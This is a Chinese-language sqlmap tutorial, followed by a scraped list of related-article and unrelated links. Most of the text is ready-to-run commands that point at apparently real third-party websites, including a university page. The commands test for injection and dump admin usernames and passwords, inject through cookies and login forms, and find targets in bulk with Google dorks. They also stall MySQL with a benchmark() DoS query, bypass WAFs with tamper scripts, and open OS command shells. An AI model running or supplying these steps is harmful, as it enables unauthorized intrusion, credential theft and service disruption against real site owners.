1.SQLMAP用于Access数据库注入

(1)猜解是否能注入
win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7"
Linux : ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7"

(2)猜解表
win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --tables
Linux: ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --tables

(3)根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)
win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --columns -T admin
Linux: ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --columns -T admin

(4)根据字段猜解内容(假如通过3得到字段为username和password)
win: python sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"
Linux: ./sqlmap.py -u "http://www.stronkin.com/en/CompHonorBig.asp?id=7" --dump -T admin -C
"username,password"

2.SQLMAP用于Cookie注入

(1)cookie注入,猜解表
win : python sqlmap.py -u "http://www.ntjx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2

(2)猜解字段,(通过1的表猜解字段,假如表为admin)
win :python sqlmap.py -u "http://www.ntjx.org/jsj/shownews.asp" --cookie "id=31" --columns -T
admin --level 2

(3)猜解内容
win :python sqlmap.py -u "http://www.ntjx.org/jsj/shownews.asp" --cookie "id=31" --dump -T
admin -C "username,password" --level 2

3.SQLMAP用于mysql中DDOS攻击
(1)获取一个Shell
win:
python sqlmap.py -u http://192.168.159.1/news.php?id=1 --sql-shell
Linux:
sqlmap -u http://192.168.159.1/news.php?id=1 --sql-shell

(2)输入执行语句完成DDOS攻击
select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

4.SQLMAP用于mysql注入
(1)查找数据库
python sqlmap.py -u "http://www.slibrary.com/link.php?id=321" --dbs

(2)通过第一步的数据库查找表(假如数据库名为dataname)
python sqlmap.py -u "http://www.slibrary.com/link.php?id=321" -D dataname --tables

(3)通过2中的表得出列名(假如表为table_name)
python sqlmap.py -u "http://www.slibrary.com/link.php?id=321" -D dataname -T table_name --columns

(4)获取字段的值(假如扫描出id,user,password字段)
python sqlmap.py -u "http://www.slibrary.com/link.php?id=321" -D dataname -T table_name -C
"id,user,password" --dump

5.SQLMAP中post登陆框注入

(1)其中的search-test.txt是通过抓包工具burp suite抓到的包并把数据保存为这个txt文件
我们在使用Sqlmap进行post型注入时,
经常会出现请求遗漏导致注入失败的情况。
这里分享一个小技巧,即结合burpsuite来使用sqlmap,
用这种方法进行post注入测试会更准确,操作起来也非常容易。
1. 浏览器打开目标地址http:// www.2cto.com /Login.asp
2. 配置burp代理(127.0.0.1:8080)以拦截请求
3. 点击login表单的submit按钮
4. 如下图,这时候Burp会拦截到了我们的登录POST请求
5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下
6. 运行sqlmap并使用如下命令:
./sqlmap.py -r search-test.txt -p tfUPass
这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,
而-p 大家应该比较熟悉,指定注入用的参数。
注入点:http://testasp.vulnweb.com/Login.asp
几种注入方式:./sqlmap.py -r search-test.txt -p tfUPass

(2)自动的搜索
sqlmap -u http://testasp.vulnweb.com/Login.asp --forms

(3)指定参数搜索
sqlmap -u http://testasp.vulnweb.com/Login.asp --data "tfUName=321&tfUPass=321"

6.SQLMAP中Google搜索注入
inurl后面的语言是由自己定的
注入过程中如果选y是注入,如果不是选n
sqlmap -g inurl:php?id=

7.SQLMAP中的请求延迟
参数 --delay --safe-freq

python sqlmap.py --dbs -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" --delay 1
python sqlmap.py --dbs -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" --safe-freq 3
参数

8.SQLMAP绕过WAF防火墙
注入点:http://192.168.159.1/news.php?id=1
sqlmap -u http://192.168.159.1/news.php?id=1 -v 3 --dbs --batch --tamper "space2morehash.py"
space2morehash.py中可以替换space2hash.py或者base64encode.py或者charencode.py
都是编码方式
space2hash.py base64encode.py charencode.py

9.SQLMAP查看权限
sqlmap -u http://192.168.159.1/news.php?id=1 --privileges

10.SQLMAP伪静态注入
(1)查找数据库
python sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" --dbs

(2)通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)
python sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" -D dataname --tables

(3)通过2中的数据表得到字段(假如得到的是tablename表)
python sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" -D dataname -T
tablename --columns

(4)通过3得到字段值(假如从3中得到字段id,password)
python sqlmap.py -u "http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html" -D dataname -T
tablename -C "password" --dump

11.SQLMAP注入点执行命令与交互写shell
(1)
注入点:http://192.168.159.1/news.php?id=1

此处采用的是Linux系统
sqlmap -u http://192.168.159.1/news.php?id=1 --os-cmd=ipconfig
出现语言的选择根据实际的测试网站选择语言

指定目标站点D:/www/

(2)获取Shell
sqlmap -u http://192.168.159.1/news.php?id=1 --os-shell
出现语言的选择根据实际的测试网站选择语言

注:原文地址 http://www.secbox.cn/hacker/web/3222.html

sqlmap注入教程的更多相关文章

  1. SQLMAP注入教程-11种常见SQLMAP使用方法详解

    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了.今天把我一直 ...

  2. 使用sqlmap注入DVWA的SQL Injection菜单

    1 使用sqlmap注入DVWA的SQL Injection菜单 本教程中的登陆地址:http://192.168.0.112/dvwa/login.php 1.1 获取cookie信息 1) 使用a ...

  3. sqlmap注入小结

    sqlmap注入时: 1.判断可注入的参数 2.判断可以用那种SQL注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些数据 sqlmap支持五种不同的注入模式: 1.基于布尔的盲注,即可 ...

  4. sqlmap注入入门

    sqlmap注入入门 sqlmap的用法: ​ linux中: sqlmap [选项] ​ Windows中: python sqlmap [选项] 常用的参数及含义: 目标 ​ -d DIRECT ...

  5. 【sql注入教程】SQL注入是什么?我们如何去玩转它

    [sql注入教程]SQL注入是什么?我们如何去玩转它 本文转自:i春秋社区   SQL注入攻击是黑客攻击数据库最常见手段之一.简单讲,SQL注入攻击是黑客利用网站程序漏洞,通过提交精心构造的SQL语句 ...

  6. [视频]K8飞刀 HackerIE自动检测网站注入教程

    [视频]K8飞刀 HackerIE自动检测网站注入教程 https://pan.baidu.com/s/1c08rihi

  7. sqlmap 注入的方法及技巧

    sqlmap 注入的方法及技巧 当给 sqlmap 这么一个 url 的时候,它会: 1.判断可注入的参数 2.判断可以用那种 SQL 注入技术来注入 3.识别出哪种数据库 4.根据用户选择,读取哪些 ...

  8. Sqlmap注入工具

    Sqlmap注入工具 http://sqlmap.org/ Sqlmap是国外的一个免费的注入工具,基于python开发,支持现在几乎所有的数据库,支持get.post.cookie注入,可以添加co ...

  9. 在windows系统和kali中通过sqlmap注入

    第1章 在windows系统中通过sqlmap注入 1.1 环境搭建 Sqlmap是目前功能最强大,使用最为广泛的注入类工具,是一个开源软件,被集成于kaliLinux, 由于sqlmap是基于Pyt ...

随机推荐

  1. CSS3中伪类nth-child和nth-of-type区别

    本篇文章由:http://xinpure.com/css3-pseudo-class-difference-between-nthchild-and-nthoftype/ 首先来看看 nth-chil ...

  2. linux下各种形式的shell加法操作总结

    linux 下shell加法操作总结: #!/bin/bash   n=1;echo -n "$n "   let "n = $n + 1" echo -n & ...

  3. 关于ie,火狐,谷歌浏览器滚动条的隐藏以及自定义样式

    最近做了一个项目,要求各个浏览器统一滚动条的样式,不显示滚动条,但是不影响鼠标的滑动事件. 查了很多资料,ie和谷歌都是可以自定义滚动条样式的,但是ie只能改变颜色,并不能修改宽度,圆角之类的.谷歌就 ...

  4. kettle--组件(1)--值映射

    组件:值映射 如下如所示: 首先,给出官方给出的文档: 个人理解: Target field name:可以理解为将source column的字段复制为另一个target column的名字. De ...

  5. Bootstrap手动打开隐藏模态框

    开发的时候遇到一个bug,关闭模态框后背景灰色图层依旧还在.原来是用错了隐藏模态框的代码. 正确的调用方式如下: $("#id").modal("show"); ...

  6. 自制MVC之工具类插件一

    1).BreakRomoteURLAttribute 提交或交互的URL数据是否来源于其它地方,站内提交,防止跨站 2). DataAttribute 取得post或get提交的数据.如果没有特殊设置 ...

  7. Calendar类经常用法 日期间的转换 set方法有巨坑

           今天发现项目的工具类方法有个bug,并且还能迷惑你的bug,刚開始也是非常迷惑,由于这个bug之前出现过,可是过了两天就自己好了.今天又出现了.哦对,今天是 2017年3月31日,之 ...

  8. atitit.提升兼容性最佳实践 p825.doc

    atitit.提升兼容性最佳实践 p825.doc 1. Atitit.兼容性的“一加三”策略1 2. 扩展表模式2 3. 同时运行模式2 3.1. 完美的后向兼容性3 3.2. 虚拟机模式3 3.3 ...

  9. 动态添加定时任务-quartz定时器

    Quartz动态添加.修改和删除定时任务 在项目中有一个需求,需要灵活配置调度任务时间,刚开始用的Java自带的java.util.Timer类,通过调度一个java.util.TimerTask任务 ...

  10. 735. Replace With Greatest From Right【medium】

    Given an array of integers, replace every element with the next greatest element (greatest element o ...